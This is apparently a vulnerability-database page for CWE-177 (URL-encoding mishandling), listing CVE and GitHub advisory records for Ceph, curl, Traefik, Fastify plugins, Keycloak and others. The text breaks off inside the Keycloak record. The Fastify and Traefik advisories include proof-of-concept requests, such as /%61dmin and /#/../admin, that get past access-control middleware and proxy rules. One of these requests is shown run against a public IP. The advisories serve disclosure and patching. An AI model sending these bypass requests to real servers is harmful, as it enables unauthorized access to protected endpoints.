CWE-177
AllowedImproper Handling of URL Encoding (Hex Encoding)
Abstraction: Variant · Status: Draft
The product does not properly handle when all or part of an input has been URL encoded.
28 vulnerabilities reference this CWE, most recent first.
CVE-2022-3854 (GCVE-0-2022-3854)
Vulnerability from cvelistv5 – Published: 2023-03-06 00:00 – Updated: 2025-03-06 18:54{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T01:20:58.403Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139925"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-3854",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-06T18:53:45.523579Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-06T18:54:06.925Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "ceph",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "As shipped with Red Hat Ceph 3, 4, and 5."
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in Ceph, relating to the URL processing on RGW backends. An attacker can exploit the URL processing by providing a null URL to crash the RGW, causing a denial of service."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-177",
"description": "CWE-177",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-03-06T00:00:00.000Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139925"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2022-3854",
"datePublished": "2023-03-06T00:00:00.000Z",
"dateReserved": "2022-11-03T00:00:00.000Z",
"dateUpdated": "2025-03-06T18:54:06.925Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-3718 (GCVE-0-2018-3718)
Vulnerability from cvelistv5 – Published: 2018-06-07 02:00 – Updated: 2024-09-16 20:36- CWE-177 - Improper Handling of URL Encoding (Hex Encoding) (CWE-177)
| URL | Tags |
|---|---|
| https://hackerone.com/reports/308721 | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| HackerOne | serve node module |
Affected:
All versions
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T04:50:30.645Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://hackerone.com/reports/308721"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "serve node module",
"vendor": "HackerOne",
"versions": [
{
"status": "affected",
"version": "All versions"
}
]
}
],
"datePublic": "2018-04-26T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "serve node module suffers from Improper Handling of URL Encoding by permitting access to ignored files if a filename is URL encoded."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-177",
"description": "Improper Handling of URL Encoding (Hex Encoding) (CWE-177)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-06-07T01:57:01.000Z",
"orgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1",
"shortName": "hackerone"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://hackerone.com/reports/308721"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "support@hackerone.com",
"DATE_PUBLIC": "2018-04-26T00:00:00",
"ID": "CVE-2018-3718",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "serve node module",
"version": {
"version_data": [
{
"version_value": "All versions"
}
]
}
}
]
},
"vendor_name": "HackerOne"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "serve node module suffers from Improper Handling of URL Encoding by permitting access to ignored files if a filename is URL encoded."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Improper Handling of URL Encoding (Hex Encoding) (CWE-177)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://hackerone.com/reports/308721",
"refsource": "MISC",
"url": "https://hackerone.com/reports/308721"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1",
"assignerShortName": "hackerone",
"cveId": "CVE-2018-3718",
"datePublished": "2018-06-07T02:00:00.000Z",
"dateReserved": "2017-12-28T00:00:00.000Z",
"dateUpdated": "2024-09-16T20:36:21.693Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
GHSA-5RC4-8QQH-VQ7F
Vulnerability from github – Published: 2021-08-09 22:24 – Updated: 2023-09-12 20:58serve node module suffers from Improper Handling of URL Encoding by permitting access to ignored files if a filename is URL encoded.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "serve"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.5.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2018-3718"
],
"database_specific": {
"cwe_ids": [
"CWE-177"
],
"github_reviewed": true,
"github_reviewed_at": "2021-08-09T22:24:10Z",
"nvd_published_at": "2018-06-07T02:29:00Z",
"severity": "MODERATE"
},
"details": "serve node module suffers from Improper Handling of URL Encoding by permitting access to ignored files if a filename is URL encoded.",
"id": "GHSA-5rc4-8qqh-vq7f",
"modified": "2023-09-12T20:58:59Z",
"published": "2021-08-09T22:24:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-3718"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/308721"
},
{
"type": "PACKAGE",
"url": "https://github.com/vercel/serve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "vercel/serve allows access to restricted files if filename is URL encoded."
}
GHSA-82RV-H33P-2XGC
Vulnerability from github – Published: 2022-06-03 00:01 – Updated: 2024-03-27 15:30The curl URL parser wrongly accepts percent-encoded URL separators like '/'when decoding the host name part of a URL, making it a different URL usingthe wrong host name when it is later retrieved.For example, a URL like http://example.com%2F127.0.0.1/, would be allowed bythe parser and get transposed into http://example.com/127.0.0.1/. This flawcan be used to circumvent filters, checks and more.
{
"affected": [],
"aliases": [
"CVE-2022-27780"
],
"database_specific": {
"cwe_ids": [
"CWE-177",
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-06-02T14:15:00Z",
"severity": "HIGH"
},
"details": "The curl URL parser wrongly accepts percent-encoded URL separators like \u0027/\u0027when decoding the host name part of a URL, making it a *different* URL usingthe wrong host name when it is later retrieved.For example, a URL like `http://example.com%2F127.0.0.1/`, would be allowed bythe parser and get transposed into `http://example.com/127.0.0.1/`. This flawcan be used to circumvent filters, checks and more.",
"id": "GHSA-82rv-h33p-2xgc",
"modified": "2024-03-27T15:30:35Z",
"published": "2022-06-03T00:01:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27780"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/1553841"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20220609-0009"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-C399-Q49H-QWC8
Vulnerability from github – Published: 2026-01-19 09:30 – Updated: 2026-01-21 01:03A vulnerability in Apache Linkis.
Problem Description
When using the JDBC engine and data source functionality, if the URL parameter configured on the frontend has undergone multiple rounds of URL encoding, it may bypass the system's checks. This bypass can trigger a vulnerability that allows unauthorized access to system files via JDBC parameters.
Scope of Impact
This issue affects Apache Linkis: from 1.3.0 through 1.7.0.
Severity level
moderate Solution Continuously check if the connection information contains the "%" character; if it does, perform URL decoding.
Users are recommended to upgrade to version 1.8.0, which fixes the issue.
More questions about this vulnerability can be discussed here: https://lists.apache.org/list?dev@linkis.apache.org:2025-9:cve
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.linkis:linkis"
},
"ranges": [
{
"events": [
{
"introduced": "1.3.0"
},
{
"fixed": "1.8.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-29847"
],
"database_specific": {
"cwe_ids": [
"CWE-177",
"CWE-20"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-21T01:03:19Z",
"nvd_published_at": "2026-01-19T09:16:01Z",
"severity": "HIGH"
},
"details": "A vulnerability in Apache Linkis.\n\nProblem Description\n\nWhen using the JDBC engine and data source functionality, if the URL parameter configured on the frontend has undergone multiple rounds of URL encoding, it may bypass the system\u0027s checks. This bypass can trigger a vulnerability that allows unauthorized access to system files via JDBC parameters.\n\nScope of Impact\n\n\nThis issue affects Apache Linkis: from 1.3.0 through 1.7.0.\n\nSeverity level\n\n\nmoderate\nSolution\nContinuously check if the connection information contains the \"%\" character; if it does, perform URL decoding.\n\nUsers are recommended to upgrade to version 1.8.0, which fixes the issue.\n\n\n\n\nMore questions about this vulnerability can be discussed here:\u00a0 https://lists.apache.org/list?dev@linkis.apache.org:2025-9:cve",
"id": "GHSA-c399-q49h-qwc8",
"modified": "2026-01-21T01:03:19Z",
"published": "2026-01-19T09:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29847"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/linkis"
},
{
"type": "WEB",
"url": "https://lists.apache.org/list?dev@linkis.apache.org:2025-9:cve"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/03l5rfkgdt022o75jp8x4tzpqxz8g057"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/09/19/2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Apache Linkis: Arbitrary File Read via Double URL Encoding Bypass"
}
GHSA-CF8F-2F35-R5WX
Vulnerability from github – Published: 2025-11-15 09:30 – Updated: 2025-11-15 09:30GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.4.4, and 18.5 before 18.5.2 that could have allowed an authenticated user to gain CSRF tokens by exploiting improper input validation in repository references combined with redirect handling weaknesses.
{
"affected": [],
"aliases": [
"CVE-2025-11990"
],
"database_specific": {
"cwe_ids": [
"CWE-177",
"CWE-22"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-15T08:15:45Z",
"severity": "LOW"
},
"details": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.4.4, and 18.5 before 18.5.2 that could have allowed an authenticated user to gain CSRF tokens by exploiting improper input validation in repository references combined with redirect handling weaknesses.",
"id": "GHSA-cf8f-2f35-r5wx",
"modified": "2025-11-15T09:30:25Z",
"published": "2025-11-15T09:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11990"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/3257843"
},
{
"type": "WEB",
"url": "https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released"
},
{
"type": "WEB",
"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/577850"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-CXRG-G7R8-W69P
Vulnerability from github – Published: 2026-01-20 16:34 – Updated: 2026-01-20 16:34Summary
A security vulnerability exists in @fastify/middie where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., /%61dmin instead of /admin). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints.
Details
The vulnerability is caused by how middie matches requests against registered middleware paths.
- Regex Generation: When fastify.use('/admin', ...) is called,
middieusespath-to-regexpto generate a regular expression for the path/admin. - Request Matching: For every request,
middieexecutes this regular expression againstreq.url(orreq.originalUrl). - The Flaw:
req.urlin Fastify contains the raw, undecoded path string.- The generated regex expects a decoded path (e.g.,
/admin). - If a request is sent to
/%61dmin, the regex comparison fails (/^\/admin/does not match/%61dmin). middieassumes the middleware does not apply and callsnext().
- The generated regex expects a decoded path (e.g.,
- Route Execution: The request proceeds to Fastify's internal router, which performs URL decoding. It correctly identifies
/%61dminas/adminand executes the corresponding route handler.
Incriminated Source Code:
In the provided middie source:
// ... inside Holder function
if (regexp) {
const result = regexp.exec(url) // <--- 'url' is undecoded.
if (result) {
// ... executes middleware ...
} else {
that.done() // <--- Middleware skipped on mismatch
}
}
PoC
Step 1: Run the following Fastify application (save as app.js):
const fastify = require('fastify')({ logger: true });
async function start() {
// Register middie for Express-style middleware support
await fastify.register(require('@fastify/middie'));
// Middleware to block /admin route
fastify.use('/admin', (req, res, next) => {
res.statusCode = 403;
res.end('Forbidden: Access to /admin is blocked');
});
// Sample routes
fastify.get('/', async (request, reply) => {
return { message: 'Welcome to the homepage' };
});
fastify.get('/admin', async (request, reply) => {
return { message: 'Admin panel' };
});
// Start server
try {
await fastify.listen({ port: 3008 });
} catch (err) {
fastify.log.error(err);
process.exit(1);
}
}
start();
Step 2: Execute the attack.
1. Normal Request (Blocked):
bash
curl http://localhost:3008/admin
# Output: Forbidden: Access to /admin is blocked
2. Bypass Request (Successful):
bash
curl http://localhost:3008/%61dmin
# Output: {"message":"Admin panel"}
Impact
- Type: Authentication/Authorization Bypass.
- Affected Components: Applications using
@fastify/middieto apply security controls (auth, rate limiting, IP filtering) to specific route prefixes. - Severity: High. Attackers can trivially bypass critical security middleware to access protected administrative or sensitive endpoints.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 9.0.3"
},
"package": {
"ecosystem": "npm",
"name": "@fastify/middie"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "9.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-22031"
],
"database_specific": {
"cwe_ids": [
"CWE-177"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-20T16:34:50Z",
"nvd_published_at": "2026-01-19T16:15:54Z",
"severity": "HIGH"
},
"details": "### Summary\nA security vulnerability exists in `@fastify/middie` where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., `/%61dmin` instead of `/admin`). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints.\n\n### Details\nThe vulnerability is caused by how `middie` matches requests against registered middleware paths.\n\n1. **Regex Generation**: When [fastify.use(\u0027/admin\u0027, ...)](cci:1://file:///Users/harshjaiswal/work/research/nest/packages/platform-fastify/adapters/fastify-adapter.ts:733:2-741:3) is called, `middie` uses `path-to-regexp` to generate a regular expression for the path `/admin`.\n2. **Request Matching**: For every request, `middie` executes this regular expression against `req.url` (or `req.originalUrl`).\n3. **The Flaw**: `req.url` in Fastify contains the **raw, undecoded** path string.\n * The generated regex expects a decoded path (e.g., `/admin`).\n * If a request is sent to `/%61dmin`, the regex comparison fails (`/^\\/admin/` does not match `/%61dmin`).\n * `middie` assumes the middleware does not apply and calls `next()`.\n4. **Route Execution**: The request proceeds to Fastify\u0027s internal router, which performs URL decoding. It correctly identifies `/%61dmin` as `/admin` and executes the corresponding route handler.\n\n**Incriminated Source Code:**\nIn the provided `middie` source:\n```javascript\n// ... inside Holder function\nif (regexp) {\n const result = regexp.exec(url) // \u003c--- \u0027url\u0027 is undecoded.\n if (result) {\n // ... executes middleware ...\n } else {\n that.done() // \u003c--- Middleware skipped on mismatch\n }\n}\n```\n\n### PoC\n**Step 1:** Run the following Fastify application (save as `app.js`):\n```javascript\nconst fastify = require(\u0027fastify\u0027)({ logger: true });\n\nasync function start() {\n // Register middie for Express-style middleware support\n await fastify.register(require(\u0027@fastify/middie\u0027));\n\n // Middleware to block /admin route\n fastify.use(\u0027/admin\u0027, (req, res, next) =\u003e {\n res.statusCode = 403;\n res.end(\u0027Forbidden: Access to /admin is blocked\u0027);\n });\n\n // Sample routes\n fastify.get(\u0027/\u0027, async (request, reply) =\u003e {\n return { message: \u0027Welcome to the homepage\u0027 };\n });\n\n fastify.get(\u0027/admin\u0027, async (request, reply) =\u003e {\n return { message: \u0027Admin panel\u0027 };\n });\n\n // Start server\n try {\n await fastify.listen({ port: 3008 });\n } catch (err) {\n fastify.log.error(err);\n process.exit(1);\n }\n}\n\nstart();\n```\n\n**Step 2:** Execute the attack.\n1. **Normal Request (Blocked):**\n ```bash\n curl http://localhost:3008/admin\n # Output: Forbidden: Access to /admin is blocked\n ```\n2. **Bypass Request (Successful):**\n ```bash\n curl http://localhost:3008/%61dmin\n # Output: {\"message\":\"Admin panel\"}\n ```\n\n### Impact\n* **Type:** Authentication/Authorization Bypass.\n* **Affected Components:** Applications using `@fastify/middie` to apply security controls (auth, rate limiting, IP filtering) to specific route prefixes.\n* **Severity:** High. Attackers can trivially bypass critical security middleware to access protected administrative or sensitive endpoints.",
"id": "GHSA-cxrg-g7r8-w69p",
"modified": "2026-01-20T16:34:50Z",
"published": "2026-01-20T16:34:50Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/fastify/middie/security/advisories/GHSA-cxrg-g7r8-w69p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22031"
},
{
"type": "WEB",
"url": "https://github.com/fastify/middie/pull/245"
},
{
"type": "WEB",
"url": "https://github.com/fastify/middie/commit/d44cd56eb724490babf7b452fdbbdd37ea2effba"
},
{
"type": "PACKAGE",
"url": "https://github.com/fastify/middie"
},
{
"type": "WEB",
"url": "https://github.com/fastify/middie/releases/tag/v9.1.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "Fastify Middie Middleware Path Bypass"
}
GHSA-FVHJ-4QFH-Q2HM
Vulnerability from github – Published: 2023-12-05 18:11 – Updated: 2023-12-07 23:06Summary
When a request is sent to Traefik with a URL fragment, Traefik automatically URL encodes and forwards the fragment to the backend server. This violates the RFC because in the origin-form the URL should only contain the absolute path and the query.
When this is combined with another frontend proxy like Nginx, it can be used to bypass frontend proxy URI-based access control restrictions.
Details
For example, we have this Nginx configuration:
location /admin {
deny all;
return 403;
}
This can be bypassed when the attacker is requesting to /#/../admin
This won’t be vulnerable if the backend server follows the RFC and ignores any characters after the fragment.
However, if Nginx is chained with another reverse proxy which automatically URL encode the character # (Traefik) the URL will become
/%23/../admin
And allow the attacker to completely bypass the Access Restriction from the Nginx Front-End proxy.
Here is a diagram to summarize the attack:

PoC

This is the POC docker I've set up. It contains Nginx, Traefik proxies and a backend server running PHP.
https://drive.google.com/file/d/1vLnA0g7N7ZKhLNmHmuJ4JJjV_J2akNMt/view?usp=sharing
Impact
This allows the attacker to completely bypass the Access Restriction from Front-End proxy.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.10.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik/v3"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.0-beta5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-47106"
],
"database_specific": {
"cwe_ids": [
"CWE-177",
"CWE-20"
],
"github_reviewed": true,
"github_reviewed_at": "2023-12-05T18:11:48Z",
"nvd_published_at": "2023-12-04T21:15:33Z",
"severity": "MODERATE"
},
"details": "### Summary\nWhen a request is sent to Traefik with a URL fragment, Traefik automatically URL encodes and forwards the fragment to the backend server. This violates the RFC because in the origin-form the URL should only contain the absolute path and the query.\n\nWhen this is combined with another frontend proxy like Nginx, it can be used to bypass frontend proxy URI-based access control\nrestrictions. \n\n### Details\nFor example, we have this Nginx configuration:\n\n```\nlocation /admin {\n deny all;\n return 403;\n}\n```\nThis can be bypassed when the attacker is requesting to /#/../admin\n\nThis won\u2019t be vulnerable if the backend server follows the RFC and ignores any characters after the fragment.\n\nHowever, if Nginx is chained with another reverse proxy which automatically URL encode the character # (Traefik) the URL will become\n\n/%23/../admin\n\nAnd allow the attacker to completely bypass the Access Restriction from the Nginx Front-End proxy.\n\nHere is a diagram to summarize the attack:\n\n\n\n### PoC\n\n\nThis is the POC docker I\u0027ve set up. It contains Nginx, Traefik proxies and a backend server running PHP.\n\nhttps://drive.google.com/file/d/1vLnA0g7N7ZKhLNmHmuJ4JJjV_J2akNMt/view?usp=sharing\n\n### Impact\nThis allows the attacker to completely bypass the Access Restriction from Front-End proxy.",
"id": "GHSA-fvhj-4qfh-q2hm",
"modified": "2023-12-07T23:06:09Z",
"published": "2023-12-05T18:11:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-fvhj-4qfh-q2hm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47106"
},
{
"type": "WEB",
"url": "https://datatracker.ietf.org/doc/html/rfc7230#section-5.3.1"
},
{
"type": "PACKAGE",
"url": "https://github.com/traefik/traefik"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/releases/tag/v2.10.6"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/releases/tag/v3.0.0-beta5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Traefik incorrectly processes fragment in the URL, leads to Authorization Bypass"
}
GHSA-G6Q3-96CP-5R5M
Vulnerability from github – Published: 2026-01-20 16:35 – Updated: 2026-01-20 16:35Summary
A security vulnerability exists in @fastify/express where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., /%61dmin instead of /admin). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints.
Details
The vulnerability is caused by how @fastify/express matches requests against registered middleware paths.
PoC
Step 1: Run the following Fastify application (save as app.js):
const fastify = require('fastify')({ logger: true });
async function start() {
// Register fastify-express for Express-style middleware support
await fastify.register(require('@fastify/express'));
// Middleware to block /admin route
fastify.use('/admin', (req, res, next) => {
res.statusCode = 403;
res.end('Forbidden: Access to /admin is blocked');
});
// Sample routes
fastify.get('/', async (request, reply) => {
return { message: 'Welcome to the homepage' };
});
fastify.get('/admin', async (request, reply) => {
return { message: 'Admin panel' };
});
fastify.get('/admin/dashboard', async (request, reply) => {
return { message: 'Admin dashboard' };
});
// Start server
try {
await fastify.listen({ port: 3000 });
} catch (err) {
fastify.log.error(err);
process.exit(1);
}
}
start();
Step 2: Execute the attack.
➜ ~ curl http://206.189.140.29:3000/%61dmin
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot GET /%61dmin</pre>
</body>
</html>
(fastify express)
➜ ~ curl http://206.189.140.29:3000/%61dmin
{"message":"Admin panel"}
It differs from CVE-2026-22031 because this is a different npm module with its own code.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.0.2"
},
"package": {
"ecosystem": "npm",
"name": "@fastify/express"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.0.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-22037"
],
"database_specific": {
"cwe_ids": [
"CWE-177",
"CWE-288"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-20T16:35:21Z",
"nvd_published_at": "2026-01-19T17:15:50Z",
"severity": "HIGH"
},
"details": "### Summary\nA security vulnerability exists in `@fastify/express` where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., `/%61dmin` instead of `/admin`). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints.\n\n### Details\nThe vulnerability is caused by how `@fastify/express` matches requests against registered middleware paths.\n\n### PoC\n**Step 1:** Run the following Fastify application (save as `app.js`):\n\n```javascript\nconst fastify = require(\u0027fastify\u0027)({ logger: true });\n\nasync function start() {\n // Register fastify-express for Express-style middleware support\n await fastify.register(require(\u0027@fastify/express\u0027));\n\n // Middleware to block /admin route\n fastify.use(\u0027/admin\u0027, (req, res, next) =\u003e {\n res.statusCode = 403;\n res.end(\u0027Forbidden: Access to /admin is blocked\u0027);\n });\n\n // Sample routes\n fastify.get(\u0027/\u0027, async (request, reply) =\u003e {\n return { message: \u0027Welcome to the homepage\u0027 };\n });\n\n fastify.get(\u0027/admin\u0027, async (request, reply) =\u003e {\n return { message: \u0027Admin panel\u0027 };\n });\n\n fastify.get(\u0027/admin/dashboard\u0027, async (request, reply) =\u003e {\n return { message: \u0027Admin dashboard\u0027 };\n });\n\n // Start server\n try {\n await fastify.listen({ port: 3000 });\n } catch (err) {\n fastify.log.error(err);\n process.exit(1);\n }\n}\n\nstart();\n```\n\n**Step 2:** Execute the attack.\n\n```\n\u279c ~ curl http://206.189.140.29:3000/%61dmin\n\u003c!DOCTYPE html\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n\u003cmeta charset=\"utf-8\"\u003e\n\u003ctitle\u003eError\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n\u003cpre\u003eCannot GET /%61dmin\u003c/pre\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\n(fastify express)\n\n\u279c ~ curl http://206.189.140.29:3000/%61dmin\n{\"message\":\"Admin panel\"}\n```\n\nIt differs from [CVE-2026-22031](https://nvd.nist.gov/vuln/detail/CVE-2026-22031) because this is a different npm module with its own code.",
"id": "GHSA-g6q3-96cp-5r5m",
"modified": "2026-01-20T16:35:21Z",
"published": "2026-01-20T16:35:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/fastify/fastify-express/security/advisories/GHSA-g6q3-96cp-5r5m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22037"
},
{
"type": "WEB",
"url": "https://github.com/fastify/fastify-express/commit/dc02a3fe1387f945143f22597baa42557d549a40"
},
{
"type": "PACKAGE",
"url": "https://github.com/fastify/fastify-express"
},
{
"type": "WEB",
"url": "https://github.com/fastify/fastify-express/releases/tag/v4.0.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "@fastify/express vulnerable to Improper Handling of URL Encoding (Hex Encoding)"
}
GHSA-G8Q8-FGGX-9R3Q
Vulnerability from github – Published: 2022-12-13 19:44 – Updated: 2023-01-25 21:37Keycloak does not properly validate URLs included in a redirect. An attacker could construct a malicious request to bypass validation and access other URLs and potentially sensitive information within the domain, or possibly conduct further attacks.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 20.0.0"
},
"package": {
"ecosystem": "Maven",
"name": "org.keycloak:keycloak-parent"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "20.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-3782"
],
"database_specific": {
"cwe_ids": [
"CWE-177",
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2022-12-13T19:44:56Z",
"nvd_published_at": "2023-01-13T06:15:00Z",
"severity": "CRITICAL"
},
"details": "Keycloak does not properly validate URLs included in a redirect. An attacker could construct a malicious request to bypass validation and access other URLs and potentially sensitive information within the domain, or possibly conduct further attacks.",
"id": "GHSA-g8q8-fggx-9r3q",
"modified": "2023-01-25T21:37:00Z",
"published": "2022-12-13T19:44:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/security/advisories/GHSA-g8q8-fggx-9r3q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3782"
},
{
"type": "WEB",
